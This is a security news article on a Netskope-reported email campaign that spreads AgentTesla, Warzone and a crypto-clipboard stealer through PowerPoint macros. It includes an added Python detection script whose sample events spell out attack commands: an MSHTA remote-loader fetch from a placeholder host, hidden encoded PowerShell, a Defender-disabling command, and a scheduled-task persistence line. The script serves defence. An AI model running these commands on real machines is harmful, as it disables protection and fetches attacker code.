Malicious Email Campaign Spreading Data Stealing Trojans Spotted in Wild

Netskope Threat Labs has documented a campaign, active since late last year, that spreads remote access trojans (RATs) through PowerPoint files.

Three prominent stealers, AgentTesla, Warzone, and a cryptocurrency stealer, are being distributed through emails carrying malicious PowerPoint files. Researchers warned people not to open suspicious attachments or respond to anything that comes from untrusted sources.

RATs Stealing Data and Money

Researchers at Netskope Threat Labs have reported on a malicious email campaign that they have been tracking since last year. Picking up pace in December 2021, the campaign delivers malicious PowerPoint files that drop popular remote access trojans (RATs).

The researchers noted three instances. In the first, PowerPoint files carrying the AgentTesla trojan were spotted. The file contains an obfuscated macro that uses two legitimate Windows tools, PowerShell and MSHTA, to execute on the victim's machine.

A VBS script then unpacks to perform two further functions, disabling Windows Defender and creating a scheduled task that runs the trojan every hour, and it also fetches a cryptocurrency stealer from a Blogger URL.
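As an added illustration (not code from the Netskope report or this article), the following Python triage routine flags the stages of the chain described above over constructed process-creation events: an Office application spawning MSHTA or PowerShell, a script host launching PowerShell, a Defender-disabling command, and an hourly scheduled task. The paths, task name and command lines are invented samples, not indicators from the campaign.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Process names involved in the described chain (Office -> MSHTA/PowerShell -> VBS -> schtasks).
OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
LOLBINS = SCRIPT_HOSTS | {"powershell.exe", "cmd.exe"}

# Defender tampering via Set-MpPreference -Disable*, and an hourly task (either /sc form).
DEFENDER_TAMPER = re.compile(r"set-mppreference\s.*-disable", re.I)
HOURLY_TASK = re.compile(r"/sc\s+(hourly|minute\s+/mo\s+60)\b", re.I)

# Constructed sample events (hypothetical paths and command lines, not real IoCs).
EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": 'mshta.exe "https://example.invalid/loader.hta"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -enc <BASE64_PLACEHOLDER>"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": 'schtasks.exe /create /sc minute /mo 60 /tn "Updater" /tr "wscript.exe C:\\Users\\Public\\u.vbs"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe notes.txt"},  # benign control event
]

def _name(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()

def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every event matching a stage of the chain."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        parent, image, cmd = _name(ev["parent"]), _name(ev["image"]), ev["cmd"]
        if parent in OFFICE_APPS and image in LOLBINS:
            hits.append((i, "office_spawns_lolbin"))
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            hits.append((i, "script_host_spawns_powershell"))
        if DEFENDER_TAMPER.search(cmd):
            hits.append((i, "defender_tamper"))
        if image == "schtasks.exe" and HOURLY_TASK.search(cmd):
            hits.append((i, "hourly_scheduled_task"))
    return hits

if __name__ == "__main__":
    for idx, rule in triage(EVENTS):
        print(f"event {idx}: {rule} <- {EVENTS[idx]['cmd']}")
```

Any one rule alone is noisy in an enterprise; the value is in several of them firing from the same process tree within minutes.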

In the second instance, another RAT, Warzone, is distributed. Netskope researchers have not detailed this one much, but note that it is as powerful as AgentTesla, which is capable of logging keystrokes, stealing clipboard data, and more.

In the final instance, a cryptocurrency stealer replaces wallet addresses for Bitcoin, Ethereum, XMR, DOGE, and other currencies in the victim's clipboard with addresses controlled by the attackers, diverting the funds. The researchers therefore advise remaining vigilant when handling such malicious emails and files, which may carry stealers.

Netskope researchers have shared the indicators of compromise (IoCs) and the cryptocurrency wallet addresses belonging to the threat actors behind this campaign, for awareness.
